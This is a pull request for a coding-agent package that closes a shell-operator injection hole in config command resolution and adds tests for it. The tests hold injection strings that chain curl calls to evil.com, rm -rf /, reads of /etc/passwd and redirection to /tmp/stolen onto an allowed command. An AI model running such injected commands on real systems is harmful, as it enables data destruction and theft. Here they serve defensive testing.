### PR TITLE
fix(security): prevent shell operator bypass in resolve-config-value

### DIFF
--- a/packages/pi-coding-agent/src/core/resolve-config-value.test.ts
+++ b/packages/pi-coding-agent/src/core/resolve-config-value.test.ts
@@ -89,6 +89,64 @@ describe("resolveConfigValue — command allowlist enforcement", () => {
 	});
 });
 
+describe("resolveConfigValue — shell operator bypass prevention", () => {
+	it("blocks semicolon chaining (pass; malicious)", () => {
+		const result = resolveConfigValue("!pass show key; curl http://evil.com");
+		assert.equal(result, undefined);
+	});
+
+	it("blocks pipe operator (pass | evil)", () => {
+		const result = resolveConfigValue("!pass show key | cat /etc/passwd");
+		assert.equal(result, undefined);
+	});
+
+	it("blocks && chaining (pass && evil)", () => {
+		const result = resolveConfigValue("!pass show key && rm -rf /");
+		assert.equal(result, undefined);
+	});
+
+	it("blocks || chaining (pass || evil)", () => {
+		const result = resolveConfigValue("!pass show key || curl evil.com");
+		assert.equal(result, undefined);
+	});
+
+	it("blocks backtick subshell (pass `evil`)", () => {
+		const result = resolveConfigValue("!pass show `curl evil.com`");
+		assert.equal(result, undefined);
+	});
+
+	it("blocks $() subshell (pass $(evil))", () => {
+		const result = resolveConfigValue("!pass show $(curl evil.com)");
+		assert.equal(result, undefined);
+	});
+
+	it("blocks output redirection (pass > file)", () => {
+		const result = resolveConfigValue("!pass show key > /tmp/stolen");
+		assert.equal(result, undefined);
+	});
+
+	it("blocks input redirection (pass < file)", () => {
+		const result = resolveConfigValue("!pass show key < /dev/null");
+		assert.equal(result, undefined);
+	});
+
+	it("writes stderr warning when shell operators detected", () => {
+		const stderrChunks: string[] = [];
+		const originalWrite = process.stderr.write.bind(process.stderr);
+		process.stderr.write = (chunk: string | Uint8Array, ...args: unknown[]) => {
+			stderrChunks.push(chunk.toString());
+			return true;
+		};
+
+		try {
+			resolveConfigValue("!pass show key; curl evil.com");
+			assert.ok(stderrChunks.some((line) => line.includes("shell operators")));
+		} finally {
+			process.stderr.write = originalWrite;
+		}
+	});
+});
+
 describe("resolveConfigValue — caching", () => {
 	it("caches the result of a blocked command", () => {
 		const callCount = { n: 0 };

--- a/packages/pi-coding-agent/src/core/resolve-config-value.ts
+++ b/packages/pi-coding-agent/src/core/resolve-config-value.ts
@@ -3,7 +3,9 @@
  * Used by auth-storage.ts and model-registry.ts.
  */
 
-import { execSync } from "child_process";
+import { execFileSync } from "child_process";
+
+const SHELL_OPERATORS = /[;|&`$><]/;
 
 // Cache for shell command results (persists for process lifetime)
 const commandResultCache = new Map<string, string | undefined>();
@@ -40,16 +42,23 @@ function executeCommand(commandConfig: string): string | undefined {
 	}
 
 	const command = commandConfig.slice(1);
-	const firstToken = command.split(/\s+/)[0];
+	const tokens = command.split(/\s+/).filter(Boolean);
+	const firstToken = tokens[0];
 	if (!SAFE_COMMAND_PREFIXES.includes(firstToken)) {
 		process.stderr.write(`[resolve-config-value] Blocked disallowed command: "${firstToken}". Allowed: ${SAFE_COMMAND_PREFIXES.join(", ")}\n`);
 		commandResultCache.set(commandConfig, undefined);
 		return undefined;
 	}
 
+	if (SHELL_OPERATORS.test(command)) {
+		process.stderr.write(`[resolve-config-value] Blocked shell operators in command: "${command}"\n`);
+		commandResultCache.set(commandConfig, undefined);
+		return undefined;
+	}
+
 	let result: string | undefined;
 	try {
-		const output = execSync(command, {
+		const output = execFileSync(firstToken, tokens.slice(1), {
 			encoding: "utf-8",
 			timeout: 10000,
 			stdio: ["ignore", "pipe", "ignore"],


### PR DESCRIPTION
## Summary
- Replaced `execSync` with `execFileSync` in `executeCommand()` to avoid shell interpretation of operators
- Added defense-in-depth regex check that blocks shell operators (`;`, `|`, `&&`, `||`, backticks, `$()`, `>`, `<`) before execution
- Added 9 test cases covering all shell operator bypass vectors

## Test plan
- [x] All 19 tests pass (10 existing + 9 new shell operator bypass tests)
- [x] Semicolon, pipe, `&&`, `||`, backtick, `$()`, `>`, `<` chaining all blocked
- [x] Allowed commands still proceed to execution
- [x] Stderr warnings emitted for blocked shell operators

🤖 Generated with [Claude Code](https://claude.com/claude-code)